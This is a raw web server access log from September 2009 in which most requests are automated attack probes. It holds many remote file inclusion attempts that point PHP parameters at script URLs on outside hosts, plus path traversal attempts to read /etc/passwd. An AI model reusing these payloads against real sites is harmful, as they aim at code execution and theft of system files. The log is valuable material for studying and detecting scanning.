211.48.121.149 - - [11/Sep/2009:03:04:25 -0500] "GET /logs//admin/setupform.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
211.48.121.149 - - [11/Sep/2009:03:04:25 -0500] "GET //admin/setupform.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
123.125.66.59 - - [11/Sep/2009:03:05:00 -0500] "GET /logs/access_log.1232582400 HTTP/1.1" 200 209098 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
65.55.230.165 - - [11/Sep/2009:03:07:28 -0500] "GET /logs/access_log.1194393600 HTTP/1.1" 200 2723 "-""Mozilla/4.0"
121.78.116.209 - - [11/Sep/2009:03:08:03 -0500] "GET /logs/access_log.1250985600//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
121.78.116.209 - - [11/Sep/2009:03:08:03 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
121.78.116.209 - - [11/Sep/2009:03:08:03 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
65.55.230.165 - - [11/Sep/2009:03:08:33 -0500] "GET /logs/access_log.1214611200 HTTP/1.1" 200 3325 "-""Mozilla/4.0"
70.90.108.169 - - [11/Sep/2009:03:09:01 -0500] "GET /index.php?redir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:03:09:01 -0500] "GET /logs/index.php?redir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:03:09:01 -0500] "GET /logs/access_log.1248825600/index.php?redir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
65.55.230.165 - - [11/Sep/2009:03:09:11 -0500] "GET /logs/access_log.1179100800 HTTP/1.1" 200 688 "-""Mozilla/4.0"
70.90.108.169 - - [11/Sep/2009:03:09:11 -0500] "GET /logs/access_log.1246579200/index.php?redir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
85.12.15.41 - - [11/Sep/2009:03:09:26 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
85.12.15.41 - - [11/Sep/2009:03:09:26 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
85.12.15.41 - - [11/Sep/2009:03:09:26 -0500] "GET /logs/access_log.1244764800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
85.12.15.41 - - [11/Sep/2009:03:09:29 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
85.12.15.41 - - [11/Sep/2009:03:09:29 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
85.12.15.41 - - [11/Sep/2009:03:09:29 -0500] "GET /logs/access_log.1244764800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
85.12.15.41 - - [11/Sep/2009:03:09:36 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
85.12.15.41 - - [11/Sep/2009:03:09:36 -0500] "GET /logs/access_log.1244764800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
85.12.15.41 - - [11/Sep/2009:03:09:36 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
211.234.100.46 - - [11/Sep/2009:03:11:52 -0500] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.234.100.46 - - [11/Sep/2009:03:11:53 -0500] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
65.55.230.165 - - [11/Sep/2009:03:11:53 -0500] "GET /logs/access_log.1199145600 HTTP/1.1" 200 1424 "-""Mozilla/4.0"
211.234.100.46 - - [11/Sep/2009:03:11:53 -0500] "GET /logs/access_log.1236211200//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
65.55.230.165 - - [11/Sep/2009:03:11:53 -0500] "GET /logs/access_log.1175990400 HTTP/1.1" 200 1202 "-""Mozilla/4.0"
211.234.100.46 - - [11/Sep/2009:03:11:55 -0500] "GET /logs/access_log.1236038400//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
66.249.68.48 - - [11/Sep/2009:03:12:11 -0500] "GET /logs/access_log.1246924800 HTTP/1.1" 200 687113 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.18.236.8 - - [11/Sep/2009:03:12:58 -0500] "GET /logs/access_log.1239840000//admin/setupform.php?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.18.236.8 - - [11/Sep/2009:03:12:58 -0500] "GET /logs/access_log.1243209600//admin/setupform.php?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:03:12:58 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:03:12:58 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:03:12:58 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:03:12:59 -0500] "GET /logs/access_log.1246320000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
65.55.207.25 - - [11/Sep/2009:03:14:38 -0500] "GET /logs/access_log.1188172800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.75.202.55 - - [11/Sep/2009:03:14:58 -0500] "GET /logs/main.php?x=http://dunkler-event.de//embed/enda-id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:03:14:58 -0500] "GET /logs/access_log.1246665600/main.php?x=http://dunkler-event.de//embed/enda-id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:03:14:58 -0500] "GET /main.php?x=http://dunkler-event.de//embed/enda-id1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:03:15:05 -0500] "GET /logs/access_log.1243987200/main.php?x=http://dunkler-event.de//embed/enda-id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:03:15:10 -0500] "GET /main.php?x=http://dunkler-event.de//embed/enda-id1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:03:15:10 -0500] "GET /logs/main.php?x=http://dunkler-event.de//embed/enda-id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:03:15:10 -0500] "GET /logs/access_log.1246665600/main.php?x=http://dunkler-event.de//embed/enda-id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:03:15:14 -0500] "GET /logs/access_log.1243987200/main.php?x=http://dunkler-event.de//embed/enda-id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
65.55.230.165 - - [11/Sep/2009:03:16:56 -0500] "GET /logs/access_log.1223510400 HTTP/1.1" 200 30254 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:03:16:57 -0500] "GET /logs/access_log.1114560000 HTTP/1.1" 200 734 "-""Mozilla/4.0"
121.78.116.209 - - [11/Sep/2009:03:18:56 -0500] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
121.78.116.209 - - [11/Sep/2009:03:18:56 -0500] "GET /logs/access_log.1244419200/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
121.78.116.209 - - [11/Sep/2009:03:18:56 -0500] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.55.230.165 - - [11/Sep/2009:03:19:15 -0500] "GET /logs/access_log.1123804800 HTTP/1.1" 200 1074 "-""Mozilla/4.0"
85.18.236.8 - - [11/Sep/2009:03:19:42 -0500] "GET /logs/access_log.1239840000//admin/setupform.php?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.18.236.8 - - [11/Sep/2009:03:19:42 -0500] "GET /logs/access_log.1243209600//admin/setupform.php?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
110.45.146.223 - - [11/Sep/2009:03:19:58 -0500] "GET /logs/access_log.1246492800//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/gb2//id1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
110.45.146.223 - - [11/Sep/2009:03:19:58 -0500] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/gb2//id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
110.45.146.223 - - [11/Sep/2009:03:19:58 -0500] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~afu/afu/gb2//id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
91.202.4.158 - - [11/Sep/2009:03:20:20 -0500] "GET /logs//page.php?id=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""-"
91.202.4.158 - - [11/Sep/2009:03:20:20 -0500] "GET //page.php?id=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""-"
91.202.4.158 - - [11/Sep/2009:03:20:20 -0500] "GET //page.php?id=./../../../../../../../../etc/passwd HTTP/1.1" 404 292 "-""-"
91.202.4.158 - - [11/Sep/2009:03:20:20 -0500] "GET /logs//page.php?id=./../../../../../../../../etc/passwd HTTP/1.1" 404 297 "-""-"
121.78.116.209 - - [11/Sep/2009:03:20:37 -0500] "GET /logs/access_log.1242000000/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
66.207.172.166 - - [11/Sep/2009:03:21:32 -0500] "GET /logs//shop/main.php?_shop_path=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
66.207.172.166 - - [11/Sep/2009:03:21:32 -0500] "GET /logs/access_log.1228608000%20%20//shop/main.php?_shop_path=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.207.172.166 - - [11/Sep/2009:03:21:34 -0500] "GET //shop/main.php?_shop_path=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
65.55.207.49 - - [11/Sep/2009:03:22:07 -0500] "GET /logs/access_log.1201478400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.230.165 - - [11/Sep/2009:03:22:55 -0500] "GET /logs/access_log.1117929600 HTTP/1.1" 200 660 "-""Mozilla/4.0"
62.75.202.55 - - [11/Sep/2009:03:25:30 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:03:25:30 -0500] "GET /logs/access_log.1250985600//phpsecurityadmin/include/logout.php?PSA_PATH=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:03:25:30 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
82.151.132.176 - - [11/Sep/2009:03:25:45 -0500] "GET /logs/access_log.1237248000//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://licitalok.com/includes/popups/one.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
82.151.132.176 - - [11/Sep/2009:03:25:45 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://licitalok.com/includes/popups/one.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
82.151.132.176 - - [11/Sep/2009:03:25:45 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://licitalok.com/includes/popups/one.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.48.121.149 - - [11/Sep/2009:03:25:50 -0500] "GET /logs//admin/setupform.php?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.48.121.149 - - [11/Sep/2009:03:25:50 -0500] "GET //admin/setupform.php?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
211.48.121.149 - - [11/Sep/2009:03:25:50 -0500] "GET /logs/access_log.1243209600//admin/setupform.php?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
82.151.132.176 - - [11/Sep/2009:03:26:06 -0500] "GET /logs/access_log.1245715200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://licitalok.com/includes/popups/one.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
65.55.230.165 - - [11/Sep/2009:03:26:20 -0500] "GET /logs/access_log.1208217600 HTTP/1.1" 200 2992 "-""Mozilla/4.0"
66.249.68.48 - - [11/Sep/2009:03:27:13 -0500] "GET /logs/access_log.1246320000 HTTP/1.1" 200 476784 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.230.165 - - [11/Sep/2009:03:28:50 -0500] "GET /logs/ HTTP/1.1" 200 204578 "-""Mozilla/4.0"
211.48.121.149 - - [11/Sep/2009:03:29:09 -0500] "GET /logs/access_log.1239840000//admin/setupform.php?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
65.55.230.165 - - [11/Sep/2009:03:29:14 -0500] "GET /logs/access_log.1163116800 HTTP/1.1" 200 328 "-""Mozilla/4.0"
66.207.172.166 - - [11/Sep/2009:03:29:28 -0500] "GET /logs/access_log.1228608000//shop/main.php?_shop_path=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.175.44.226 - - [11/Sep/2009:03:29:57 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.175.44.226 - - [11/Sep/2009:03:29:58 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.175.44.226 - - [11/Sep/2009:03:29:58 -0500] "GET /logs/access_log.1250985600//phpsecurityadmin/include/logout.php?PSA_PATH=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
65.55.230.165 - - [11/Sep/2009:03:29:58 -0500] "GET /logs/access_log.1243468800 HTTP/1.1" 200 543704 "-""Mozilla/4.0"
206.225.95.33 - - [11/Sep/2009:03:30:51 -0500] "GET /logs/access_log.1247356800/phphtml.php?htmlclass_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
206.225.95.33 - - [11/Sep/2009:03:30:51 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
206.225.95.33 - - [11/Sep/2009:03:30:51 -0500] "GET /phphtml.php?htmlclass_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
206.225.95.33 - - [11/Sep/2009:03:30:53 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
206.225.95.33 - - [11/Sep/2009:03:30:53 -0500] "GET /logs/access_log.1247356800/phphtml.php?htmlclass_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
206.225.95.33 - - [11/Sep/2009:03:30:53 -0500] "GET /phphtml.php?htmlclass_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
69.175.44.226 - - [11/Sep/2009:03:31:01 -0500] "GET /logs/access_log.1248134400//phpsecurityadmin/include/logout.php?PSA_PATH=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
209.172.33.230 - - [11/Sep/2009:03:31:11 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
209.172.33.230 - - [11/Sep/2009:03:31:11 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
209.172.33.230 - - [11/Sep/2009:03:31:11 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
206.225.95.33 - - [11/Sep/2009:03:31:18 -0500] "GET /logs/access_log.1243296000/phphtml.php?htmlclass_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
206.225.95.33 - - [11/Sep/2009:03:31:25 -0500] "GET /logs/access_log.1243296000/phphtml.php?htmlclass_path=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:03:32:30 -0500] "GET /logs/access_log.1244592000//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:03:32:30 -0500] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:03:32:30 -0500] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:03:32:30 -0500] "GET /logs/access_log.1244419200//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
65.55.230.165 - - [11/Sep/2009:03:33:02 -0500] "GET /logs/access_log.1201219200 HTTP/1.1" 200 697 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:03:33:02 -0500] "GET /logs/access_log.1231545600 HTTP/1.1" 200 168660 "-""Mozilla/4.0"
72.51.42.92 - - [11/Sep/2009:03:35:07 -0500] "GET /index.php?redir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
72.51.42.92 - - [11/Sep/2009:03:35:07 -0500] "GET /logs/index.php?redir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
72.51.42.92 - - [11/Sep/2009:03:35:07 -0500] "GET /logs/access_log.1247270400/index.php?redir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
72.51.42.92 - - [11/Sep/2009:03:35:49 -0500] "GET /logs/access_log.1247443200/index.php?redir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.78.116.209 - - [11/Sep/2009:03:36:29 -0500] "GET /become_editor.php?theme_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
121.78.116.209 - - [11/Sep/2009:03:36:29 -0500] "GET /logs/access_log.1245715200/become_editor.php?theme_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
121.78.116.209 - - [11/Sep/2009:03:36:29 -0500] "GET /logs/become_editor.php?theme_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
118.107.162.36 - - [11/Sep/2009:03:36:39 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
118.107.162.36 - - [11/Sep/2009:03:36:39 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
118.107.162.36 - - [11/Sep/2009:03:36:39 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
121.78.116.209 - - [11/Sep/2009:03:36:43 -0500] "GET /logs/access_log.1248134400//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
121.78.116.209 - - [11/Sep/2009:03:37:12 -0500] "GET /logs/access_log.1238112000/become_editor.php?theme_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.55.106.161 - - [11/Sep/2009:03:38:08 -0500] "GET /logs/access_log.1196380800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.75.202.55 - - [11/Sep/2009:03:39:05 -0500] "GET //administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:03:39:05 -0500] "GET /logs/access_log.1244764800//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:03:39:05 -0500] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:03:40:27 -0500] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:03:40:27 -0500] "GET /logs/access_log.1244419200/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:03:40:27 -0500] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.55.106.206 - - [11/Sep/2009:03:40:38 -0500] "GET /logs/access_log.1229472000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
70.90.108.169 - - [11/Sep/2009:03:40:44 -0500] "GET /logs/access_log.1242000000/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
65.55.207.50 - - [11/Sep/2009:03:42:08 -0500] "GET /logs/access_log.1139270400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.75.202.55 - - [11/Sep/2009:03:43:26 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:03:43:26 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:03:43:26 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:03:43:28 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:03:43:28 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:03:43:28 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.55.106.185 - - [11/Sep/2009:03:43:41 -0500] "GET /logs/access_log.1107475200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.75.202.55 - - [11/Sep/2009:03:44:14 -0500] "GET /logs/access_log.1236211200//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:03:44:14 -0500] "GET /logs/access_log.1244764800//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
